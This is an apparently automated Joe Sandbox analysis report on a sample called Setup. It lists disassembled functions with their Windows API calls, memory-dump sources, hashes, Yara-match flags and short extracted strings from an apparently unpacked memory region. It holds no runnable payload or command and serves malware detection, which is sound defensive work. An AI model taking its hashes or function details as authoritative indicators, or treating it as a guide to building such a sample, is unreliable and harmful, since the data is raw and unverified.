FindFirstFileA.KERNEL32(00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463A3B
FindNextFileA.KERNEL32(000000FF,?,00000000,00463B14,?,00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463AF0
FindClose.KERNEL32(000000FF,00463B1B,00463B14,?,00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463B0E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 0b3613e65d71d7dc44e76010238e6a35c3653d94be8eae95c3326d35ff194d36
Instruction ID: 97f58be689a7aad7613f851e0c4409f020999d87f0ba5e9b9459bb80848a8bb9
Opcode Fuzzy Hash: 0b3613e65d71d7dc44e76010238e6a35c3653d94be8eae95c3326d35ff194d36
Instruction Fuzzy Hash: 26417034A00658DBCB10EFA5DC859DEB7B8EB88305F4045AAF804A7341EB789F458E59

Function 0042E7A8 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E7CA
DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E802
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E80A
SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E810

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast$CloseControlCreateDeviceFileHandle
String ID:
API String ID: 1177325624-0
Opcode ID: 8e905f8c365742880d2336d062eafc928be91e0b94102443e2b8cdd253c5cd8a
Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
Opcode Fuzzy Hash: 8e905f8c365742880d2336d062eafc928be91e0b94102443e2b8cdd253c5cd8a
Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D

Function 02FAE615 Relevance: 6.4, Strings: 5, Instructions: 172COMMON

Download Yara Rule

Strings

C799, xrefs: 02FAE780
A44D, xrefs: 02FAE836
FAD2, xrefs: 02FAE775
Q, xrefs: 02FAE627
448D, xrefs: 02FAE76A

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 448D$A44D$C799$FAD2$Q
API String ID: 0-2108904528
Opcode ID: e292dedafc13aa269a6d568415a76a3349dec15934144b705f7601aaf98414cf
Instruction ID: 01cb9ff257408d1bf817392add5f95dedc0f0eb00bdded73c5a99f189d8abf8a
Opcode Fuzzy Hash: e292dedafc13aa269a6d568415a76a3349dec15934144b705f7601aaf98414cf
Instruction Fuzzy Hash: 9451E1B1A583828BD734CF24C8907EFBBE2AFD1200F19C83EC5D997641EA7444468B53

Function 00481EB4 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(0001041A), ref: 00481EF2
GetWindowLongA.USER32(00000000,000000F0), ref: 00481F10
ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,004815EE,00481622,00000000,00481642,?,?,00000001,0049B050), ref: 00481F32
ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,004815EE,00481622,00000000,00481642,?,?,00000001,0049B050), ref: 00481F46

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: af8061b05167794754b0a9c9442d058168bcb8b310635e8bde69a5f17e1c480d
Instruction ID: a151493f8bb258e154686fc306989cafdf15b2fa5ae2d2c6c79316c3cae0d13f
Opcode Fuzzy Hash: af8061b05167794754b0a9c9442d058168bcb8b310635e8bde69a5f17e1c480d
Instruction Fuzzy Hash: C20171702442059AD710F72A9D45B6F239CAB12308F0808BBBE519B6B3DB6D9C56974C

Function 02FBDE6E Relevance: 5.4, Strings: 4, Instructions: 382COMMON

Download Yara Rule

Strings

cp, xrefs: 02FBDF3C
=>, xrefs: 02FBE15C
uJ, xrefs: 02FBDF44
|M, xrefs: 02FBDF4C

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: =>$cp$uJ$|M
API String ID: 0-1514985077
Opcode ID: 781cd75821efe07003423c0cb0297968d0ec0e68aa7172f147190e00cd053726
Instruction ID: 81abb290450dc9002bb5670431ab63223b48e24c571ffe8d3aa387fbb0fd38c6
Opcode Fuzzy Hash: 781cd75821efe07003423c0cb0297968d0ec0e68aa7172f147190e00cd053726
Instruction Fuzzy Hash: 3BB111B09083058BC724DF29C8927ABB7F1FF81394F58895CE9958B3A0E739D506CB52

Function 02FE0FAE Relevance: 5.4, Strings: 4, Instructions: 380COMMON

Download Yara Rule

Strings

[\]^, xrefs: 02FE1055, 02FE1150
CyJ~, xrefs: 02FE101B
GyJ~, xrefs: 02FE104E
BABC, xrefs: 02FE106E

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: BABC$CyJ~$GyJ~$[\]^
API String ID: 0-478348243
Opcode ID: d9939f88e878a7df04c08e716864bd181f573828d66f47a7fce3af5cb7683875
Instruction ID: 1be2480408b5e684c2b07f6d247a06e57ca8c2f676d9d590735fa777ea6b3b11
Opcode Fuzzy Hash: d9939f88e878a7df04c08e716864bd181f573828d66f47a7fce3af5cb7683875
Instruction Fuzzy Hash: 0FA13732B083508BDB29CE29CC9166BB7D6EBD5314F19853CEA9BD7290C7349C05C792

Function 02FBD835 Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

R{[., xrefs: 02FBD91D
Y8Y:, xrefs: 02FBD94D
34, xrefs: 02FBD965
2{[., xrefs: 02FBD8EC

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 2{[.$34$R{[.$Y8Y:
API String ID: 0-2379750456
Opcode ID: f6b4d7e717c707324097a9fd8c306e23788a2be0b807b48a42f076c605e921ef
Instruction ID: 6c20306c39f88e7fcf44ad53b4f23089c57d3434128739fdb054d08bd273fd51
Opcode Fuzzy Hash: f6b4d7e717c707324097a9fd8c306e23788a2be0b807b48a42f076c605e921ef
Instruction Fuzzy Hash: B961DEB295D340AEE301DFA6884596FFBF2EFD5700F44C96CE1C59B205C67885088B87

Function 00461F78 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0046204C), ref: 00461FD0
FindNextFileA.KERNEL32(000000FF,?,00000000,0046202C,?,00000000,?,00000000,0046204C), ref: 0046200C
FindClose.KERNEL32(000000FF,00462033,0046202C,?,00000000,?,00000000,0046204C), ref: 00462026

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 93f5bb04f951d88d8c8828c7527f25e44ed50626bf1d26d365534a7f40ca07cf
Instruction ID: 501593defdbab8929c71f5630084487ab8f477331e3ec7d708c0d9d753d3c012
Opcode Fuzzy Hash: 93f5bb04f951d88d8c8828c7527f25e44ed50626bf1d26d365534a7f40ca07cf
Instruction Fuzzy Hash: C121A831904B08BEDB11EF65CC41ADEBBBCDB49704F5084B7B908E21A1E67C9E45CA5A

Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(0001041A), ref: 004241F4
SetActiveWindow.USER32(0001041A,?,?,0046BECB), ref: 00424201

Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021825AC,0042421A,0001041A,?,?,0046BECB), ref: 00423B5F

SetFocus.USER32(00000000,0001041A,?,?,0046BECB), ref: 0042422E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8

Function 02FBDB0B Relevance: 4.1, Strings: 3, Instructions: 308COMMON

Download Yara Rule

Strings

<=, xrefs: 02FBDD49
vw, xrefs: 02FBDB9C
]xyz, xrefs: 02FBDDDE

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: <=$]xyz$vw
API String ID: 0-4000600231
Opcode ID: eb80690e35f6da247a7b5e1ebb9c2ef1789e362491166564faa04d853df3e3c9
Instruction ID: 4e0603f56ae4e890d92edffbf0a708772fa57f82a86d2c6626aee479a15c067f
Opcode Fuzzy Hash: eb80690e35f6da247a7b5e1ebb9c2ef1789e362491166564faa04d853df3e3c9
Instruction Fuzzy Hash: A67123B06083048BD7299F25C8A27ABB3F1EF863A4F18C91CE9C64B391E7789505C757

Function 02FCF934 Relevance: 4.0, Strings: 3, Instructions: 281COMMON

Download Yara Rule

Strings

p$w&, xrefs: 02FCFD29
IO{H, xrefs: 02FCFB5A
yX=Z, xrefs: 02FCFD30

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: IO{H$p$w&$yX=Z
API String ID: 0-258344299
Opcode ID: ac168e5c794510c57f396d26eafb5eb82ea17d1e137a0f7fc6b4058d790f4dee
Instruction ID: 9eede97cf709862e80c7604bb453a8d5951751b590476d2b3831af2bb66e781f
Opcode Fuzzy Hash: ac168e5c794510c57f396d26eafb5eb82ea17d1e137a0f7fc6b4058d790f4dee
Instruction Fuzzy Hash: 6991D2716047428FD329CF25C5A0762FBE2AF97204F28C69ED5E64BB96C739E406CB50

Function 02FCFA74 Relevance: 4.0, Strings: 3, Instructions: 276COMMON

Download Yara Rule

Strings

p$w&, xrefs: 02FCFD29
IO{H, xrefs: 02FCFB5A
yX=Z, xrefs: 02FCFD30

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: IO{H$p$w&$yX=Z
API String ID: 0-258344299
Opcode ID: 579baf21dd3e77a5de39d7429a66f87c1b0c687d54997badf17cfdc843ff598b
Instruction ID: ff9c9eaf30f42f2627c70851b743fbd34dcd4caad2b817914d243edb25e0e8b3
Opcode Fuzzy Hash: 579baf21dd3e77a5de39d7429a66f87c1b0c687d54997badf17cfdc843ff598b
Instruction Fuzzy Hash: 2D91F4716047428FD329CF3585A0762FBE2AF97204F28C69ED5E68B796C73AD406CB50

Function 02FCFA18 Relevance: 4.0, Strings: 3, Instructions: 276COMMON

Download Yara Rule

Strings

p$w&, xrefs: 02FCFD29
IO{H, xrefs: 02FCFB5A
yX=Z, xrefs: 02FCFD30

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: IO{H$p$w&$yX=Z
API String ID: 0-258344299
Opcode ID: 21c65a4614b2094b7f09e0f2480a2d4b02bbdd23b0e933c442b79c8e4819c543
Instruction ID: 6744d8e0d0bdb5e70c86d76cfef8dafe4c7f917ae0802a09dcd14f43f3da4c6b
Opcode Fuzzy Hash: 21c65a4614b2094b7f09e0f2480a2d4b02bbdd23b0e933c442b79c8e4819c543
Instruction Fuzzy Hash: CF91F2716047428FD3298F3985A0762FBE2AF97204F28C69ED5E64BB96C739D406CB10

Function 02FB6A7A Relevance: 4.0, Strings: 3, Instructions: 264COMMON

Download Yara Rule

Strings

], xrefs: 02FB6A82
C88,, xrefs: 02FB6AA0
h{, xrefs: 02FB6C40

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: C88,$]$h{
API String ID: 0-1275662315
Opcode ID: 3498720844ccf4fa702b1a8283ebe467285b8b67823c20fe53fa86cc580be6c5
Instruction ID: 8ec9e8685942380b12620e19b479d7f53ee833bcd934fbf95d1ab096a3d0c94c
Opcode Fuzzy Hash: 3498720844ccf4fa702b1a8283ebe467285b8b67823c20fe53fa86cc580be6c5
Instruction Fuzzy Hash: CF91AEB08093908FD3248F16C4A07ABBBF1FF86354F15995CD58A9F7A1D3B98845CB52

Function 02FCFA62 Relevance: 4.0, Strings: 3, Instructions: 249COMMON

Download Yara Rule

Strings

p$w&, xrefs: 02FCFD29
IO{H, xrefs: 02FCFB5A
yX=Z, xrefs: 02FCFD30

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: IO{H$p$w&$yX=Z
API String ID: 0-258344299
Opcode ID: 91abf5d5f44ba0007092eb3476dbfaf43d5ab6ab314252f32db8800f8a38335f
Instruction ID: 77fd2d0f268bb95170b0869bff79867475de71ba8cb8338294d028a26c391cc7
Opcode Fuzzy Hash: 91abf5d5f44ba0007092eb3476dbfaf43d5ab6ab314252f32db8800f8a38335f
Instruction Fuzzy Hash: 3571F271A047828FD325CF2585A0762FBE2AF97200F28C69ED5D64F796C739D406CB51

Function 0046E060 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,0049B178), ref: 0046E06D

Strings

%.4u%.2u%.2u, xrefs: 0046E09C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: LocalTime
String ID: %.4u%.2u%.2u
API String ID: 481472006-3392497728
Opcode ID: 2c1f9135d6528951cc5bb18409fa5210e8b96e3c0ee08a42abf71b8bcd7e8f5f
Instruction ID: 1e0c74392e637a6ea44569a55999c631b3b205693cfcd7d07337eb9990bd8535
Opcode Fuzzy Hash: 2c1f9135d6528951cc5bb18409fa5210e8b96e3c0ee08a42abf71b8bcd7e8f5f
Instruction Fuzzy Hash: 6AF0FEA0C0425D9ACB00DBEA88457FEBBF8AB0C214F44016AE944F6381E6794A40C7B6

Function 00456218 Relevance: 3.1, APIs: 2, Instructions: 89comCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

CoCreateInstance.OLE32(00498AA0,00000000,00000001,00498AB0,?,?,00000000,00456329,?,?,?), ref: 004562B0
SysFreeString.OLEAUT32(00000000), ref: 004562E8

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: String$AllocByteCharCreateFreeFullInstanceMultiNamePathWide
String ID:
API String ID: 3611476835-0
Opcode ID: 5455eb23c557121a2f59713d6d940aeb1b7d5ee67c8d31df16f40a14d39b9fea
Instruction ID: 90b87c50729888695869d4c8ae259c2a75421ebb78cca4836a9062d1afc7ed1f
Opcode Fuzzy Hash: 5455eb23c557121a2f59713d6d940aeb1b7d5ee67c8d31df16f40a14d39b9fea
Instruction Fuzzy Hash: 6D317371A04214AFDB10EFA9CC45BAFBBF8EF05305F4144AAF804E7292D7785908CB59

Function 02FCD02F Relevance: 3.1, Strings: 2, Instructions: 555COMMON

Download Yara Rule

Strings

6, xrefs: 02FCD5EE
\g, xrefs: 02FCD0A8

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: \g$6
API String ID: 0-3854233087
Opcode ID: 0facdce89b5b464362f0ac4d97857785db8d2a732dc754e132523c7dfef9b39d
Instruction ID: dfce7dd8212dc18ab1ee254d9bcf19fdc35354a557d753279a16bd6b56c05fc9
Opcode Fuzzy Hash: 0facdce89b5b464362f0ac4d97857785db8d2a732dc754e132523c7dfef9b39d
Instruction Fuzzy Hash: C51280B4804B82AFE325AF398652752BFB0FF12240F14466DD5E64BB45D335A02ACFD6

Function 0040AFD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: 936ef5c44aeed1f2042d4c86535649bfebbcc465c3926438fea1193abaa24ab4
Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
Opcode Fuzzy Hash: 936ef5c44aeed1f2042d4c86535649bfebbcc465c3926438fea1193abaa24ab4
Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD

Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 27cd6f1a1aab1ceb2c02a4b71596b5ee0c1af9df45b06411c7b3ae1ae91b0d5e
Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
Opcode Fuzzy Hash: 27cd6f1a1aab1ceb2c02a4b71596b5ee0c1af9df45b06411c7b3ae1ae91b0d5e
Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8

Function 004520D0 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00452133,?,?,-00000001,00000000), ref: 0045210D
GetLastError.KERNEL32(00000000,?,00000000,00452133,?,?,-00000001,00000000), ref: 00452115

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 89e1bd3f671fec9ea419af04d9b5747ec3c861377534335fe0002177c38b92b1
Instruction ID: 036c49f36eb25fa61e7078d8567b07750d6f93a8171c6e64b92e95661d512f34
Opcode Fuzzy Hash: 89e1bd3f671fec9ea419af04d9b5747ec3c861377534335fe0002177c38b92b1
Instruction Fuzzy Hash: E4F0FE71A046046B8B10DF6A9D0149FF7ACDB46725B504677FC14D3292D6795E044598

Function 00482320 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,0048252A,00000000,004825CF,?,?,?,?,?,004972EC), ref: 0048232E
GetVersionExA.KERNEL32(0000009C,?,0048252A,00000000,004825CF,?,?,?,?,?,004972EC), ref: 00482380

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: e08bcac008fed9ad95c57f4989a7c84ce53f4bc5aef2523b2b35f86db4630739
Instruction ID: 86f070f074b995b26219b027e325ef6f62db68d692dea7ad18929a709bde23b6
Opcode Fuzzy Hash: e08bcac008fed9ad95c57f4989a7c84ce53f4bc5aef2523b2b35f86db4630739
Instruction Fuzzy Hash: 84016D245086C089E370EB3A9A117AFBAE19FA9304F484C2FD9CCD2253E7BC8155D75A

Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004175D3
GetCapture.USER32 ref: 004175DC

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 98474c88dc50d444d03dffbc555dd312b578b4a35858106b4beb348d40d48b05
Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
Opcode Fuzzy Hash: 98474c88dc50d444d03dffbc555dd312b578b4a35858106b4beb348d40d48b05
